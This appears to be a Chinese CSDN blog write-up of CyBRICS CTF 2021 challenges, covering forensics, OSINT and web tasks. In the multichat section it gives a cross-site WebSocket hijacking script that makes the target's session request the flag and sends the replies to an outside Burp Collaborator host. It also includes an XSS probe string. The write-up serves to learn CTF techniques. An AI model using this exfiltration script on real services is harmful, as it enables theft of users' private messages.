CyBBICS CTF(wp + 复现)

最新推荐文章于 2022-05-22 19:40:26 发布
最新推荐文章于 2022-05-22 19:40:26 发布
阅读量5.1k 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53755216/article/details/119061990
版权

文章目录

CyBBICS CTF

本次比赛算是做出了四个题 (俩题是合作的 第二天一题也没做出 吐血
什么时候才能变强(期待。。。

scanner

写个脚本跑出二维码 再ps一下 就能扫(我脚本跑出来的不是正方形。。。

from PIL import Image ,ImageSequence

# im = Image.open("vid.gif")
# # print(im.size)  (1080, 1080)
# index = 1
# for frame in ImageSequence.Iterator(im):
#     frame = frame.convert("RGB")
#     frame.save("hack/kill{}.png".format(index))
#     index += 1




points = []


index = 20
def search(png):
    for x in range(0,1080):
        for y in range(0,1080):
            # print(png.getpixel((x, y)))
            if png.getpixel((x, y)) == (0, 0, 0):
                points.append((x, y-index*21))


# im = Image.open("hack/kill9.png")
# search(im)
# print(points)
# 496 - 517 之间 的图像给截取出来?  21



for i in range(1,146):
    index -= 1
    print(index)
    im = Image.open("hack/kill{}.png".format(i))
    search(im)

pic = Image.new('1',(1080,3200),255)

for poin in points:

    pic.putpixel(poin,0)
pic.save("hack/example.png")

announcement

貌似只有一个发送邮件的api
看看有没有什么更多的信息?

POST一个东西 有啥用?

digest=311003a76495b5a4207add1e272c755f&email=q2313%40qq.com

貌似一个对应的 Email 会生成 一个对应的 digest

所以?如果我们能找到规律 是不是就能改下 email的值来搞点事情?

感觉这题是个xss?

构造

<svg/onload=alert(xss)>

在其中实现xss

<div class="fw-bolder">Form submission successful! We will contact you by the email 16032658@qq.com in three days (before July 27).</div>

结果是个注入题 简单写个脚本跑出flag
cybrics{1N53r7_0ld_900d_5ql}

CAPTCHA The Flag

Guessing challenges? On my CyBRICS? It’s more likely than you think.
Prove you’re a true CTFer!

纯手工 重复25次拿到flag 累死我了。。。

multichat

发消息是属实搞 。。。
真的就给条消息。。。

cookie有没有什么可以利用的点?无
发现管理员会与我们给的url交互

在自己的vps挂钓鱼网站
csrf
没打通

<script>
  var ws = new WebSocket('ws://multichat-cybrics2021.ctf.su/ws');
  ws.onopen = function() {
    ws.send("Hey, i forgot the flag. Can you remind me?");
  };
  ws.onmessage = function(event) {
    fetch('https://von3nc1ll1rvwvn4tqnub7o7kyqoed.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body: event.data});
  };
</script>

比赛后问学长 改句话即可

<script>
  var ws = new WebSocket('ws://multichat-cybrics2021.ctf.su/ws');
  ws.onopen = function() {
    ws.send("Hey, i forgot the flag. Can you remind me?");
  };
  ws.onmessage = function(event) {
          new Image().src="https://von3nc1ll1rvwvn4tqnub7o7kyqoed.burpcollaborator.net"+event.data;
  };
</script>

Signer

直接给了py文件 看一下
吐血 做不出来

checkname

我们从犯罪分子的计算机上获得了主文件夹。尝试找到他/她的真实姓名。

.bash_history

git add *
git commit -m "instagram filter"
git push origin main
rm *
ls -la
rm -rf .git

.profile

# ~/.profile: executed by Bourne-compatible login shells.

if [ "$BASH" ]; then
  if [ -f ~/.bashrc ]; then
    . ~/.bashrc
  fi
fi

mesg n 2> /dev/null || true

.bashrc

# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

# If not running interactively, don't do anything
[ -z "$PS1" ] && return

# don't put duplicate lines in the history. See bash(1) for more options
# ... or force ignoredups and ignorespace
HISTCONTROL=ignoredups:ignorespace

# append to the history file, don't overwrite it
shopt -s histappend

# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000

# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize

# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"

# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi

# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
    xterm-color) color_prompt=yes;;
esac

# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes

if [ -n "$force_color_prompt" ]; then
    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
    # We have color support; assume it's compliant with Ecma-48
    # (ISO/IEC-6429). (Lack of such support is extremely rare, and such
    # a case would tend to support setf rather than setaf.)
    color_prompt=yes
    else
    color_prompt=
    fi
fi

if [ "$color_prompt" = yes ]; then
    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
    PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt

# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
    PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
    ;;
*)
    ;;
esac

# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
    test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
    alias ls='ls --color=auto'
    #alias dir='dir --color=auto'
    #alias vdir='vdir --color=auto'

    alias grep='grep --color=auto'
    alias fgrep='fgrep --color=auto'
    alias egrep='egrep --color=auto'
fi

# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'

# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.

if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi

# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
#if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
#    . /etc/bash_completion
#fi

profile与bashrc都是Shell的启动设置档,角色类似Microsoft
DOS/Windows下的autoexec.bat文件,以下就是这二种文件自己个别的文字叙述。

或许从该黑客的个人习惯下手?
比如 alias?

# If this is an xterm set the title to user@host:dir

尝试搜寻 vividcoala无果 做不动了

复现
instagram 是一款社交软件(没听说过 吐血

搜到此账户 有一张机票 名没有给二维码打码
然后对二维码进行分析
可以得出 此人的真实姓名

lx100

什么是 lx100?
在这里插入图片描述
一款摄像机

随便扔条请求到谷歌上搜索

GET /cam.cgi?mode=camcmd&value=recmode HTTP/1.1

搜到一个github仓库 https://github.com/cleverfox/lumixproto
里面是关于接口的信息

找到传视频的接口

在这里插入图片描述
发现以 UDP 格式传输

直接筛选出所有的 UDP 包包
把数据导出来
用010 Editor 打开后 搜索 FF D8 和 FF D9
发现搜索到了455个 图片
写脚本将 455 个图片均提取出来?

from binascii import *
datas = []

with open("seek.txt","r") as s:
    d = s.readlines()
    for i in d:
        i = i[:-2]
        # print(i.encode())
        datas.append(int(i.encode(),16))
        # datas.append(b2a_hex(i.encode()))
#




file = open("fu","rb")
index = 0
for i in range(len(datas)):
    head = datas[i]
    file.seek(int(head))
    data = file.read()
    index += 1
    with open("photo/{}.jpg".format(index),"wb") as jpg:
        jpg.write(data)

结束了。。。
在这里插入图片描述
收获:

  1. 学会了收集相关信息(以前都是直接上去摁看 啥都不会也摁看
  2. 学会了处理数据 (导出 , 定位 ,写脚本提取文件 。。。
  3. 搞明白了图片中地址的信息
b1ue0cean
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CG-CTF——WP(WEB[一])
hahaha233330的博客
12-03 1270
CG-CTF——WriteUp(一) 工具: ①Winhex:图片隐写工具,可通过搜索“ctf”“CTF”“key”“flag”等关键字得到flag。 ②在线工具HtmlEncode/BASE64转换:注意源代码里奇怪的字符串,可以尝试解码(分清类型)。 ③BurpSuite:抓包工具,这个很好用。 ④Wireshark:抓包工具。使用说明: 1、签到题 直接F12查看源代码就可以得到flag...
CyBRICS CTF 2020 NetWork部分 WP
h1nt的博客
08-21 485
国内CTF流量分析的题目较少,就想着整理点东西 刚好这会有空把之前打的cybrics ctf 2020 的流量题的WP给写了 XCorp baby难度的题 拿到数据包直接用wireshark打开 根据提示我们将SMB对象导出 可以得到几个文件,关键的就是那几个能用的exe(22KB的都是,那个xcorp是改了名的) 打开显示需要输入用户名 再去流量包里搜索得到用户名即可得到flag 得到flag Google Cloud 一打开就是一堆ICMP报文。。 随便看看可以在
CTF实验吧 这就是一个坑wp (明文攻击)
ADreamClusive的博客
08-07 9791
这就是一个坑wp 我们打开压缩包的tips.txt,里面提示:密码是十位大小写字母、数字、特殊符号组成的,你爆破的开么?! 这个tip告诉我们爆破是基本不可能了 然后我们发现falg.zip里面也有个tips.txt,然后我猜想flag.zip里面的tips.txt和另外一个tip
CTFShow“萌心区”WP(上)
Aluxian_的博客
05-22 1124
CTFShow “萌新区”WP详解萌新认证萌新_密码1萌新_密码2萌新_密码3萌新_密码3隐写1隐写2萌新 隐写2萌新 隐写3萌新 隐写4萌新 隐写5萌新隐写6Audacity CTFShow 平台:https://ctf.show/ 萌新认证 纯签到题 直接在公告找 或者输入萌新码 注意:萌新码是从一个固定池里随机分配的,不是统一的。 萌新_密码1 先进行base16 解码 然后解码出来的字符有= 结尾 感觉是base64 得到一串像flag 的字符串 然后在使用 栅栏密码 栏数为2 最后
ics-07—CTF
qq_40646572的博客
04-16 2226
审题 打开链接地址显示如下: 点击项目管理链接,转到目标网页 发现页面有一个view-source按钮(一开始没发现可以点击,打开源代码的时候发现,这是一个链接地址。) view_source页面代码如下: 通过代码审计,发现session会话要有admin用户的信息,才可以进行文件上传的操作。 那么首先需要在session会话获取admin用户的身份,通过下面的代码审计,发现可以利用id 这个参数。 admin身份绕过 首先看到此处的代码,想着能不能使用sql注入的方式绕过,sql注入没能成功.
ctf训练+比赛环境.zip
09-30
在IT领域,尤其是网络安全竞赛(CTF:Capture The Flag),"ctf训练+比赛环境.zip" 提供了一个用于学习和实战演练的环境。这个压缩包文件内包含了一个名为 "ctfWorker-master" 的项目,很可能是CTF比赛常用的靶场...
CTF比赛题目复现源码+项目说明.zip
01-16
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。 3、本资源作为“参考资料...CTF比赛题目复现源码+项目说明.zip
ctf+tools+tools+nmap(windows)
最新发布
06-11
这个就是一个nmap得安装程序,在这上面备份一下,用来写博客时提供安装包
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
CTF攻防世界-WEB高阶区-ics-06
qq_37698661的博客
11-30 648
ics-06 创建测试场景,并点击题目链接进入题目场景 场景页面: 尝试点击每个模块功能,发现大多都不能使用,随后想起题目描述所给出的提示:“云平台报表心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。”,依据提示,说明一定会存在一个能够访问的url链接,在点击了每个模块之后,发现仅有名为“报表心”模块能够使用,故继续沿着该线索做题 随意选择日期范围,尝试查看是否出现解题线索: 页面无回显,那么确定这个不是解题线索。故继续在题目页面寻找线索,注意到url处显示拼接了参数
从Wireshark抓包来看IP分片
热门推荐
qq_41866334的博客
07-27 1万+
从Wireshark抓包来看UDP协议的分片 文件来自于前几天CyBRICS 2021lx100题目,因为做题时候被IP分片坑到了,发现自己对于网络这一块的知识掌握的并不好,所以写一篇文章来理一下。为了省事就直接用比赛的pcap文件做样例了:点击。 UDP/lPv4分片 一般来说我们都知道MTU是1500字节,因此超过1500字节的数据就需要进行ip分片。包含源和目的端口号的UDP头部只出现在第一个分片里,分片由IPv4头部的标识(Identification)、分片偏移(Fragment offie
初试ctf wp
c1042503039的博客
02-21 2148
初试ctf wp X-forwarded -for和reffer 根据提示,想到要请求真是的ip,于是我用burpsuite,拦截后到repeater,添加xff,这里遇到些问题,到r后,必须先go,再去添加xff才能有正确的提示,经验吧积累。后面又试了又不是这样,纳闷。 看到“必须来自www.google.com”所以想到还要加referer flag就出现了 实验证明,xff可以不用大写,小...
CTF-传统知识+古典密码 WP
05-14 3301
题目: 小明某一天收到一封密信,信写了几个不同的年份 辛卯,癸巳,丙戌,辛未,庚辰,癸酉,己卯,癸巳。 信的背面还写有“+甲子”,请解出这段密文。 key值:CTF{XXX} 解题思路: 看到有甲子,戊戌等,网上查找下天干地支的文档 六十年甲子(干支表) 1 2 3 4 5 6 7 8 ...
关于CTF压缩包的那些事
qq_42551635的博客
05-14 5819
关于CTF压缩包的那些事 前言 CTF比赛经常会给你各种各样奇怪加密方式的压缩包,这里基于合天相关课程学习小小的总结一下,可能不全,持续更新 利用进制转换隐藏信息 给你一大串十六进制字符串 你发现是50 4B 03 04 开头的,他其实是个压缩包,放入winhex改后缀保存即可得到zip文件,zip文件里有flag 作为冗余信息藏在其他文件 winhex打开,搜索该文件文件尾,看后面是否还有压缩包文件头 解决方式,直接将后缀名改为zip解压 利用隐写隐藏在其他文件 LSB为常规隐写算法,使用steg
HITCTF 2018 wp [我真是菜鸟]
Assassin
02-02 5779
WEB PHPreading 源码泄露,存在index.php.bak,,解一下base64知道 $flag=$_GET['asdfgjxzkallgj8852'];if($flag=='H1TctF2018EzCTF'){die($flag);}die('emmmm'); 输入得到flag BabyEval 看一下泄露了一部分源码 <!-- $str=@(str
XCTF Web 高手区005: ics-06
立志成为最会敲代码的dancer,最会locking的程序猿
04-04 208
题目: WP: 进入场景,发现只有报表心的按钮有效,点击进入 这里提示是送分题,说明本题不需要多虑 看一下URL id=1 很明显,我们应该尝试注入 理所当然打开burpsuite 发现id=某个具体值 显然不能一个一个试 这是选择爆破 提前在测试器板块下导入字典文件 用爆破模板搞一下 id=2333 成功注入 response看到flag ...
攻防世界-web-Cat(XCTF 4th-WHCTF-2017)
Sea_Sand息禅
07-08 1万+
打开网页,有一个云端测试功能,提示我们输入域名,输入几个进行测试 1) baidu.com 没有反馈 但是输入百度的ip:220.181.38.148,反馈如下 PING 220.181.38.148 (220.181.38.148) 56(84) bytes of data. --- 220.181.38.148 ping statistics --- 1 packets transm...
2021 CyBRICS Multichat题解
读万卷书,行万里路。
08-15 380
0 前言 这是一个 CSRF 的题目,以前没怎么做过这类题目,还是挺有趣的。HackTrick 介绍对于这种Cross-site WebSocket hijacking 的介绍挺详细的。传送门 1 题解 在服务器创建文件 w.html(记得将 IP 替换为自己服务器的 IP) <meta charset="utf-8"> <script> function ws(){ var ws = new WebSocket("ws://multichat-cyb
攻防世界-web-ics-07-从0到1的解题历程writeup
CTF小白的博客
04-17 3360
题目分析 首先拿到题目描述:工控云管理系统项目管理页面解析漏洞 找到题目入口 点击view-source对源码进行审计 if (isset($_GET[page]) && $_GET[page] != 'index.php') {      include('f...
ctf+nodejs学习
12-13
CTF是一种网络安全技术竞赛,其包含了各种各样的题目类型,例如密码学、Web安全、二进制漏洞等等。Node.js是一种基于Chrome V8引擎的JavaScript运行环境,它可以使JavaScript在服务器端运行。在CTF比赛,Node.js可以用于编写Web安全题目,例如利用Node.js的弱类型特性进行类型转换漏洞攻击等。如果你想学习CTF和Node.js,可以参考以下资源: 1. CTF Wiki:https://ctf-wiki.github.io/ctf-wiki/ 2. Node.js官方文档:https://nodejs.org/en/docs/ 3. Node.js安全指南:https://nodesecroadmap.fyi/ 4. Node.js CTF题目库:https://github.com/NodeSecurity/node-ctf-archive 5. 《Node.js安全编码指南》:https://www.gitbook.com/book/chrisdickinson/node-security/details
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值